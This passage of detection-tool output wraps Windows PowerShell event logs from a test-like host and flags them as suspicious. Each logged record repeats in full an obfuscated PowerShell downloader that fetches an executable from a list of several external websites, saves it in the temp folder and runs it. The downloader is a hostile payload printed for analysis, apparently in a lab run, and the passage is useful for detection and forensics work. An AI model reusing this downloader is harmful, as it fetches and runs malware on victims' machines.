os;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Get-Item): &quot;Get-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:33.349710Z"">
</TimeCreated>
<EventRecordID>789</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=27
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Get-Item): &quot;Get-Item&quot;
ParameterBinding(Get-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Object): &quot;New-Object&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:29.115150Z"">
</TimeCreated>
<EventRecordID>787</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=23
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&q